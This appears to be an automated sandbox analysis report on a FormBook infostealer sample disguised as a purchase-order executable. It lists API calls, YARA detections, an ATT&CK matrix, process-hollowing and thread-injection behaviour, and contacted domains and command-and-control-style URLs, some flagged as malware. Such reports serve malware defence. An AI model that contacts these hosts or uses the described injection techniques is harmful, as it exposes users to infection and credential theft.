          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_0070DC00 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,4_2_0070DC00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_00707490 RegOpenKeyExW,RegOpenKeyExW,SysFreeString,RegCloseKey,RegCloseKey,WideCharToMultiByte,__alloca_probe_16,WideCharToMultiByte,RegOpenKeyExA,GetLastError,RegisterEventSourceW,GetUserNameW,LookupAccountNameW,LookupAccountNameW,ReportEventW,DeregisterEventSource,4_2_00707490
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_0070A9C0 InitializeCriticalSection,GetVersionExA,4_2_0070A9C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.Purchase Order#23113.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Purchase Order#23113.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Purchase Order#23113.exe.40c9970.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4200202747.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4200153899.0000000004C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1771916843.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.Purchase Order#23113.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Purchase Order#23113.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Purchase Order#23113.exe.40c9970.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4200202747.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4200153899.0000000004C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1771916843.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_00715880 CreateBindCtx,MkParseDisplayName,4_2_00715880
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_0070CD6C CoCreateInstance,CoCreateInstance,GetUserDefaultLCID,CoGetClassObject,CreateBindCtx,4_2_0070CD6C

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Native API          		1
          DLL Side-Loading          		612
          Process Injection          		1
          Masquerading          		OS Credential Dumping1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Shared Modules          		Boot or Logon Initialization Scripts1
          DLL Side-Loading          		1
          Disable or Modify Tools          		LSASS Memory131
          Security Software Discovery          		Remote Desktop ProtocolData from Removable Media4
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)41
          Virtualization/Sandbox Evasion          		Security Account Manager2
          Process Discovery          		SMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook612
          Process Injection          		NTDS41
          Virtualization/Sandbox Evasion          		Distributed Component Object ModelInput Capture13
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          Application Window Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
          Obfuscated Files or Information          		Cached Domain Credentials1
          Account Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
          Software Packing          		DCSync1
          System Owner/User Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Timestomp          		Proc Filesystem1
          File and Directory Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          DLL Side-Loading          		/etc/passwd and /etc/shadow124
          System Information Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1422056 Sample: Purchase Order#23113.exe Startdate: 08/04/2024 Architecture: WINDOWS Score: 100 34 www.yoursweets.online 2->34 36 www.xaqh.info 2->36 38 16 other IPs or domains 2->38 42 Snort IDS alert for network traffic 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 10 other signatures 2->48 11 Purchase Order#23113.exe 3 2->11         started        signatures3 process4 signatures5 56 Injects a PE file into a foreign processes 11->56 14 Purchase Order#23113.exe 11->14         started        process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Sample uses process hollowing technique 14->62 64 Queues an APC in another process (thread injection) 14->64 17 explorer.exe 73 1 14->17 injected process8 dnsIp9 28 www.mingshengglass.com 102.134.40.151, 49744, 80 sun-asnSC South Africa 17->28 30 oregonjobs.co 66.147.240.91, 49750, 80 UNIFIEDLAYER-AS-1US United States 17->30 32 6 other IPs or domains 17->32 40 System process connects to network (likely due to code injection or exploit) 17->40 21 cscript.exe 17->21         started        signatures10 process11 signatures12 50 Modifies the context of a thread in another process (thread injection) 21->50 52 Maps a DLL or memory area into another process 21->52 54 Tries to detect virtualization through RDTSC time measurements 21->54 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Purchase Order#23113.exe32%ReversingLabsWin32.Trojan.Generic
          Purchase Order#23113.exe39%VirustotalBrowse
          Purchase Order#23113.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          www.xaqh.info1%VirustotalBrowse
          snugandkind.com1%VirustotalBrowse
          www.owletbaby.shop0%VirustotalBrowse
          www.mingshengglass.com0%VirustotalBrowse
          studioenginedemo.com1%VirustotalBrowse
          oregonjobs.co1%VirustotalBrowse
          gratiasempirellc.com2%VirustotalBrowse
          shops.myshopify.com0%VirustotalBrowse
          www.brandonbirk.com0%VirustotalBrowse
          www.yoursweets.online0%VirustotalBrowse
          www.gratiasempirellc.com1%VirustotalBrowse
          www.massagechairspecialists.com1%VirustotalBrowse
          www.snugandkind.com0%VirustotalBrowse
          www.oregonjobs.co0%VirustotalBrowse
          www.studioenginedemo.com0%VirustotalBrowse
          www.mks-digital.net0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img0%URL Reputationsafe
          https://outlook.com_0%URL Reputationsafe
          https://powerpoint.office.comcember0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://schemas.micro0%URL Reputationsafe
          http://www.studioenginedemo.comReferer:0%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.massagechairspecialists.com0%Avira URL Cloudsafe
          http://www.gratiasempirellc.com/vr01/www.sampleshubusa.com0%Avira URL Cloudsafe
          http://www.oregonjobs.co/vr01/0%Avira URL Cloudsafe
          http://www.brandonbirk.com0%Avira URL Cloudsafe
          http://www.yoursweets.online100%Avira URL Cloudmalware
          http://www.xaqh.info0%Avira URL Cloudsafe
          http://www.oregonjobs.co/vr01/0%VirustotalBrowse
          http://www.xaqh.info/vr01/?Vr=L4nHMf5x&YN9P-lUP=IPhgDyoL8PETBIlA+LipHiQIJ5tdYs8vDEe7V5bx7imqp8ZSB+vz7lbDvtba/1SpkLzf0%Avira URL Cloudsafe
          http://www.owletbaby.shop/vr01/0%Avira URL Cloudsafe
          http://www.xaqh.info1%VirustotalBrowse
          http://www.studioenginedemo.com0%Avira URL Cloudsafe
          http://www.studioenginedemo.com/vr01/www.oregonjobs.co0%Avira URL Cloudsafe
          http://www.owletbaby.shop/vr01/0%VirustotalBrowse
          http://www.studioenginedemo.com0%VirustotalBrowse
          http://www.founder.com.cn/cn/cThe0%Avira URL Cloudsafe
          http://www.brandonbirk.com0%VirustotalBrowse
          http://www.topdeals.biz/vr01/0%Avira URL Cloudsafe
          http://www.yoursweets.online/vr01/www.massagechairspecialists.com100%Avira URL Cloudmalware
          http://www.mks-digital.net/vr01/?Vr=L4nHMf5x&YN9P-lUP=fg5rWdIOm16VAcpULIi6VqF28GIEm83UbJ9UUTJ5CcfameYBqVWF6xiHMvk1uSJgUfvX0%Avira URL Cloudsafe
          http://www.snugandkind.comReferer:0%Avira URL Cloudsafe
          http://www.yoursweets.online0%VirustotalBrowse
          http://www.gratiasempirellc.com/vr01/0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%VirustotalBrowse
          http://www.topdeals.biz/vr01/www.kidscircle.shop0%Avira URL Cloudsafe
          http://www.massagechairspecialists.com1%VirustotalBrowse
          http://www.zhongyicts.com.cn0%Avira URL Cloudsafe
          http://www.snugandkind.com/vr01/?Vr=L4nHMf5x&YN9P-lUP=GUL62cbCCJOJReCemxk1O8Otc3kXCElGSolYG/8Ig6Cn2Nx69M0sY0/cN1gdp8glXS6z0%Avira URL Cloudsafe
          http://www.sampleshubusa.com0%Avira URL Cloudsafe
          http://www.oregonjobs.coReferer:0%Avira URL Cloudsafe
          http://www.oregonjobs.co/vr01/?Vr=L4nHMf5x&YN9P-lUP=wFZ5enEBtK4n2aaiRnhfStMJiblJh5bHmGRWjDpakqkf/10aPf5zMfbio25A5myUwmpi0%Avira URL Cloudsafe
          http://www.kidscircle.shopReferer:0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cn1%VirustotalBrowse
          http://www.sampleshubusa.com0%VirustotalBrowse
          http://www.snugandkind.com/vr01/www.owletbaby.shop0%Avira URL Cloudsafe
          www.yoursweets.online/vr01/100%Avira URL Cloudmalware
          http://www.gratiasempirellc.com/vr01/1%VirustotalBrowse
          http://www.mks-digital.net/vr01/0%Avira URL Cloudsafe
          http://www.oregonjobs.co/vr01/www.gratiasempirellc.com0%Avira URL Cloudsafe
          http://www.yesxoit.xyz/vr01/www.studioenginedemo.com0%Avira URL Cloudsafe
